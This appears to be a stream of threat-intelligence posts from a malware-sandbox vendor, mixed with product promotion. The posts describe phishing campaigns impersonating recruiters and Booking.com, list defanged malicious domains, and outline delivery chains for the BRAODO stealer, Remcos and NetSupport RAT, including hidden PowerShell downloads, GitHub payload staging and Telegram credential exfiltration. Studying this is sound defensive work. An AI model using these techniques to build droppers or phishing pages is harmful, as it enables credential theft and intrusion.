💼 Recruitment-Themed #Phishing Campaigns Target Facebook Users.
🚨 A new wave of phishing attacks is targeting job seekers with fake job offers impersonating brands like Red Bull, Tesla, Meta AI, and others. Attackers use #spearphishing emails to lure victims into applying for fictional positions by logging in via Facebook. These campaigns often spoof legitimate recruitment platforms like indeed[.]com using #typosquatted domains.

👨‍💻 See analysis sessions:
Porsche: https://app.any.run/tasks/cce7aac5-0cea-400b-aec6-1f436e74dd25/?utm_source=mastodon&utm_medium=post&utm_campaign=phishing_facebook&utm_term=250625&utm_content=linktoservice
Tesla: https://app.any.run/tasks/1ec08aeb-9089-45e4-b649-3acaa2923b77/?utm_source=mastodon&utm_medium=post&utm_campaign=phishing_facebook&utm_term=250625&utm_content=linktoservice
Red Bull: https://app.any.run/tasks/7360ea7f-0496-465a-b9ac-6749aa162d64/?utm_source=mastodon&utm_medium=post&utm_campaign=phishing_facebook&utm_term=250625&utm_content=linktoservice

⚠️ Even though the pages mimic legitimate job platforms, several red flags expose #malicious behavior:
🔹 No redirection to Facebook’s official SSO
🔹 IP fingerprinting via services like ipapi and ipify
🔹 In some cases, exfiltration of credentials using socket[.]io and attacker-controlled Telegram bots

🔍 Search for Red Bull-themed recruitment phishing using TI Lookup:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=phishing_facebook&utm_content=linktoti&utm_term=250625#%7B%2522query%2522:%2522domainName:%255C%2522redbull%255C%2522%2520AND%2520(domainName:%255C%2522ipapi%255C%2522%2520OR%2520domainName:%255C%2522ipify%255C%2522)%2520AND%2520domainName:%255C%2522.onrender.com%255C%2522%2522,%2522dateRange%2522:180%7D%20

Another observed trend includes the abuse of indeed[.]com through #typosquatting: lndeed[.]com. See example: https://app.any.run/tasks/fce3c537-de65-4138-bd1f-2dccc16c32c2/?utm_source=mastodon&utm_medium=post&utm_campaign=phishing_facebook&utm_term=250625&utm_content=linktoservice

🔍 Find more typosquatted domains using this TI Lookup request:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=phishing_facebook&utm_content=linktoti&utm_term=250625#%7B%2522query%2522:%2522domainName:%255C%2522lndeed%255C%2522%2522,%2522dateRange%2522:180%7D%20

🔗 Execution chain:
Phishing email or link ➡️ Fake job offer ➡️ Fake Facebook login form ➡️ Credentials & IP exfiltration via WebSocket or Telegram bot

🛡️ Recommendation for users and organizations:
🔹 Always enable 2FA
🔹 Cross-check job offers on official company websites
🔹 Avoid disclosing PII unless interacting via verified recruiting platforms like LinkedIn or Indeed

#IOCs:
aimetahire [.] com
aimetajobs [.] com
aimetatalents [.] com
applyjobfast [.] com
jobapplycareer [.] com
redbullrecruit [.] com
redbullrecruitee [.] com
redbulltalents [.] com
tesla-recruit [.] com
lndeed [.] help
applyopenjobsonlndeed [.] space
lndeedresume [.] com

🚀 Use #ANYRUN Interactive Sandbox to analyze suspicious emails and URLs, extract #IOCs, and uncover hidden network activity, such as external IP gathering.

🎯 Registry abuse helps #malware maintain persistence and stealth on infected endpoints.
Detonating suspicious files in #ANYRUN Sandbox gives instant visibility into registry activity.

Explore examples, featuring #FormBook and script-based attacks 👇
https://any.run/cybersecurity-blog/how-to-spot-malware-registry-abuse/?utm_source=mastodon&utm_medium=post&utm_campaign=spot_registry_abuse&utm_term=240625&utm_content=linktoblog

#cybersecurity #infosec

🎙️ Watch Live: Fast Threat Detection and Hands-On Training with #ANYRUN

Join our first livestream with Level Effect to sharpen your skills and see ANYRUN in action
📅 June 25, 11 A.M. EST

YouTube: https://youtube.com/live/tH7-4XFWPk0
Twitch: https://twitch.tv/leveleffect

🎯 Proactive threat monitoring just got easier with TAXII support in #ANYRUN's TI Feeds.

Access actionable #IOCs from investigations across 15,000 organizations, export via API or SDK in STIX & MISP formats and easily integrate into your #SOC tools 👇
https://any.run/cybersecurity-blog/taxii-protocol-integration/?utm_source=mastodon&utm_medium=post&utm_campaign=taxii_protocol_integration&utm_term=200625&utm_content=linktoblog

#infosec #cybersecurity

👨‍💻 Faster triage, incident response, and better threat visibility. #ANYRUN helps #SOC teams handle advanced threats with speed and precision.

Use the action plan from our webinar to streamline your investigations and workflows: https://youtu.be/pS-vw_J3xn8?si=uUNrD8f52qQKD9gf

🚨 #BRAODO Stealer Abuses GitHub for Payload Staging and Hosting.
⚠️ A new campaign distributing this #malware leverages public #GitHub repository, including raw file content, to host payloads. The primary goal of this stealer is data exfiltration, and at the time of analysis, its detection rate was low. The #BAT files used in the campaign include misleading comments to complicate analysis.

👨‍💻 #ANYRUN’s Script Tracer simplifies the process by logging the multi-stage execution flow step by step, without the need for manual deobfuscation. Let’s take a closer look at this threat’s behavior using #ANYRUN Interactive Sandbox, which provides full visibility into process activity and persistence mechanisms.

🔗 Execution chain:
BAT ➡️ CMD ➡️ #PowerShell ➡️ BAT ➡️ PowerShell ➡️ Python (🚨 BRAODO Stealer)

Analysis session: https://app.any.run/tasks/75be7fd8-8984-4b54-bd18-c98305cc94a8/?utm_source=mastodon&utm_medium=post&utm_campaign=braodo_github&utm_term=180625&utm_content=linktoservice

⚠️ The first BAT file executes CMD command that launches PowerShell in hidden mode to avoid displaying a visible window. It then downloads a second BAT file from github[.]com, disguised as a .PNG file, saves it to the %temp% folder, and executes it.

The second BAT file launches a new PowerShell script file, that removes components from the earlier stages, enforces TLS 1.2, retrieves an additional payload from raw.githubusercontent[.]com, saving it in the Startup folder and downloads main payload in a ZIP file.

🚨 The final payload, BRAODO Stealer, is extracted from a ZIP file, stored in the Public directory and executed using python.exe. After execution, it deletes the initial archive to reduce artifacts.

The Python file is obfuscated with pyobfuscate and contains non-encrypted, custom Base64-encoded payload strings appended to the script.

🚀 Use #ANYRUN Interactive Sandbox to trace every step, extract #IOCs, and understand how obfuscated multi-layer payloads behave in real environments.

🏛️ Government agencies use #ANYRUN for faster threat detection, investigation, and mitigation

See how our solutions help analyze and respond to threats targeting organizations, with real-world cases like the attack on US Social Security Administration 👇
https://any.run/cybersecurity-blog/how-to-investigate-government-cyber-attacks/?utm_source=mastodon&utm_medium=post&utm_campaign=government_attacks&utm_term=180625&utm_content=linktoblog

#cybersecurity #infosec

⚠️ Modern SOCs face nonstop threats, alert fatigue, and pressure to respond fast
🔍 Find out how #ANYRUN's feeds, offering fresh #IOCs from threats across 15k businesses, can level up your ability to monitor, detect, and mitigate incidents: https://any.run/cybersecurity-blog/threat-intelligence-feeds-for-better-soc-performance/?utm_source=mastodon&utm_medium=post&utm_campaign=ti_feeds_for_soc&utm_content=linktoblog&utm_term=170625

Do you use TI feeds in your SOC workflow?

#threatintel #ThreatIntelligence #cybersecurity

🚀 You now can integrate #ANYRUN's Threat Intelligence Feeds via #TAXII protocol.

Learn how you can use this fast and secure way to receive our fresh, uniquely sourced network #IOCs for proactive monitoring and detection ⬇️
https://any.run/cybersecurity-blog/taxii-protocol-integration/?utm_source=mastodon&utm_medium=post&utm_campaign=taxii_protocol_integration&utm_term=120625&utm_content=linktoblog

🚨 Control-Flow Flattening Obfuscated #JavaScript Drops #Remcos.
⚠️ The observed JS contains multiple self-invoking functions that loop arrays of strings and numbers in a while(!![]) loop until a calculated checksum matches a predefined value. This #obfuscation technique forces static analyzers to parse through the array content instead of returning the required string directly.

🎯 #ANYRUN’s Script Tracer enables easy analysis of heavily obfuscated scripts by logging their execution in real time, with no need for manual deobfuscation.

🔗 Execution chain:
#Wscript (JavaScript) ➡️ PowerShell ➡️ MSBuild (Remcos 🚨)

👨‍💻 See analysis session: https://app.any.run/tasks/eaef10ea-3567-4284-b87e-a3a0aedc5f83/?utm_source=mastodon&utm_medium=post&utm_campaign=obfuscated_js_drops_remcos&utm_term=110625&utm_content=linktoservice

This script invokes #PowerShell using ActiveXObject("http://WScript.Shell") with parameters and executes the following:
🔹 Creates a http://System.Net.WebClient object
🔹 Specifies the URL to download the binary
🔹 Downloads the binary data and passes it to #MSBuild

⚠️ As a result, the script downloads and executes the Remcos #malware module.

👨‍💻 Observe obfuscated loaders, explore execution flows, and extract behavioral indicators in real time. Improve your security operations with #ANYRUN Sandbox.

Остерегайтесь «песочных террористов»

Представьте: вы разработчик коммерческого ПО. В один прекрасный день пользователи начинают сообщать, что популярный блокировщик uBlock Origin не дает скачать ваш продукт. Никакой рекламы или сторонних баннеров в приложении нет и никогда не было. Невозможно? Вчера мы столкнулись именно с такой целенаправленной атакой на репутацию. Под катом — интриги, расследование, анатомия атаки и выводы, которые могут спасти и ваш проект. больше чернухи

https://habr.com/ru/articles/917702/

#anyrun #антивирус #spamhaus #динамический_анализ_кода #песочница #malware #malware_analysis #атака_на_репутацию #antivirus

🎯 Threat Intelligence Feeds play a major role in #SOC performance.

🔍 Find out how #ANYRUN's feeds, offering fresh #IOCs from threats across 15k businesses, can level up your ability to monitor, detect, and mitigate incidents.
https://any.run/cybersecurity-blog/threat-intelligence-feeds-for-better-soc-performance/?utm_source=mastodon&utm_medium=post&utm_campaign=ti_feeds_for_soc&utm_term=110625&utm_content=linktoblog

🚀 From faster alert triage and incident response to better threat visibility, #ANYRUN helps #SOCs save time and effort across different day-to-day operations.

Your team can benefit too. Just use the action plan from our recent webinar ⬇️
https://any.run/cybersecurity-blog/action-plan-for-soc-webinar-recap/?utm_source=mastodon&utm_medium=post&utm_campaign=soc_webinar_recap&utm_term=100625&utm_content=linktoblog

#infosec #cybersecurity

👨‍💻 #Malware analysis starts with choosing the right OS. With #Android OS support, SOC teams using #ANYRUN now have the flexibility to investigate a greater variety of malware samples, extending analysis to mobile file types.

Check out the full guide to analyzing threats across platforms:
https://any.run/cybersecurity-blog/how-to-analyze-malware-threats/?utm_source=mastodon&utm_medium=post&utm_campaign=analyze_malware_threats_poll&utm_term=100625&utm_content=linktoblog

Which type of threats do you analyze most frequently?

🚨 #Obfuscated BAT file used to deliver NetSupport RAT

At the time of the analysis, the sample had not yet been submitted to #VirusTotal ⚠️

👨‍💻 See sandbox session: https://app.any.run/tasks/db6fcb53-6f10-464e-9883-72fd7f1db294?utm_source=mastodon&utm_medium=post&utm_campaign=obfuscated_bat_file&utm_content=linktoservice&utm_term=050625

🔗 Execution chain:
cmd.exe (BAT) ➡️ #PowerShell ➡️ PowerShell ➡️ #client32.exe (NetSupport client) ➡️ reg.exe

Key details:
🔹 Uses a 'client32' process to run #NetSupport #RAT and add it to autorun in registry via reg.exe
🔹 Creates an 'Options' folder in %APPDATA % if missing
🔹 NetSupport client downloads a task .zip file, extracts, and runs it from %APPDATA%\Application .zip
🔹 Deletes ZIP files after execution

❗️ BAT droppers remain a common choice in attacks as threat actors continue to find new methods to evade detection.

Use #ANYRUN’s Interactive Sandbox to quickly trace the full execution chain and uncover #malware behavior for fast and informed response.

#cybersecurity #infosec

🚀 In May, #ANYRUN got another threat detection boost with 900+ new behavior signatures, #YARA and #Suricata rules.

We also redesigned the onboarding tutorial and added TAXII support for TI Feeds 🔍

👨‍💻 Check out and explore all updates: https://any.run/cybersecurity-blog/release-notes-may-2025/?utm_source=mastodon&utm_medium=post&utm_campaign=release_notes_may_25&utm_term=050625&utm_content=linktoblog

Cyber Attacks on Government Agencies: Detect and Investigate

This analysis examines cyber threats targeting government institutions worldwide, focusing on three case studies: a phishing email targeting the South Carolina Department of Employment and Workforce, a fraudulent domain mimicking the U.S. Social Security Administration, and a malicious PDF posing as a South African Judiciary notice. The study demonstrates how ANY.RUN's solutions, including Threat Intelligence Lookup, Interactive Sandbox, and YARA Search, can be utilized to detect, analyze, and mitigate these threats. Key findings include the use of FormBook stealer, remote access tools, and credential harvesting techniques. The analysis provides actionable insights for government cybersecurity teams to enhance their defensive strategies and response capabilities.

Pulse ID: 68409d6271a2178e01aa5e79
Pulse Link: https://otx.alienvault.com/pulse/68409d6271a2178e01aa5e79
Pulse Author: AlienVault
Created: 2025-06-04 19:24:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#ANYRUN #Africa #CredentialHarvesting #CyberAttack #CyberAttacks #CyberSecurity #Email #FormBook #Government #InfoSec #Mimic #OTX #OpenThreatExchange #PDF #Phishing #RAT #RCE #bot #AlienVault

☀️ Summer is Here and So Are Fake Bookings 🎣
🚨 #Phishing emails disguised as #booking confirmations are heating up during this summer travel season, using #ClickFix techniques to deliver #malware.
Fake http://Booking.com emails typically request payment confirmation or additional service fees, urging victims to interact with malicious payloads.
👨‍💻 Fake payment form analysis session: https://app.any.run/tasks/84cffd74-ab86-4cd3-9b61-02d2e4756635/?utm_source=mastodon&utm_medium=post&utm_campaign=seasonal_clickfix&utm_content=linktoservice&utm_term=040625

🔍 A quick search in Threat Intelligence Lookup reveals a clear spike in activity during May-June. Use this search request to find related domains, IPs, and sandbox analysis sessions:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=seasonal_clickfix&utm_content=linktoti&utm_term=040625#%7B%2522query%2522:%2522domainName:%255C%2522booking.%255C%2522%2520AND%2520threatLevel:%255C%2522malicious%255C%2522%2522,%2522dateRange%2522:30%7D%20

Most recent samples use ClickFix, a #fakecaptcha where the victim is tricked into copy-pasting and running a #PowerShell downloader via terminal.
👨‍💻 ClickFix analysis session: https://app.any.run/tasks/2e5679ef-1b4a-4a45-a364-d183e65b754c/?utm_source=mastodon&utm_medium=post&utm_campaign=seasonal_clickfix&utm_content=linktoservice&utm_term=040625

The downloaded executables belong to the #RAT malware families, giving attackers full remote access to infected systems.

❗️ How to stay safe from seasonal phishing threats during your vacation:
1️⃣ Validate sender domains. Emails from trusted booking providers, hotels, and airlines typically come from official domains such as
@booking
.com,
@airline
.com

2️⃣ Analyze suspicious files with #ANYRUN. Use #ANYRUN’s interactive sandbox to quickly detect threats, safely detonate phishing URLs, and observe malicious behavior in a controlled environment.

3️⃣ Only enter your personal data on trusted websites. Look for a valid HTTPS certificate and double-check that the site belongs to the real service.

4️⃣ Train staff on phishing and brand impersonation tactics, especially during peak travel periods.

🏝️ Have a safe and sweet vacation!

🏛️ Government agencies use #ANYRUN to detect and investigate #phishing for faster response and mitigation.

See how with analysis of real-world #cyberattacks on US Social Security Administration and others ⬇️
https://any.run/cybersecurity-blog/how-to-investigate-government-cyber-attacks/?utm_source=mastodon&utm_medium=post&utm_campaign=investigate_government_attacks&utm_content=linktoblog&utm_term=040625

👨‍💻 #ANYRUN's Threat Intelligence Feeds include #IOCs, IOBs, and IOAs from the latest attacks on 15,000 organizations.

🔍 Discover how integrating them can improve threat detection and help your business meet key security KPIs: https://any.run/cybersecurity-blog/reduce-mttd-with-ti-feeds/?utm_source=mastodon&utm_medium=post&utm_campaign=SOC_KPIs_feeds&utm_content=linktoblog&utm_term=040625

#threatintel #cybersecurity #infosec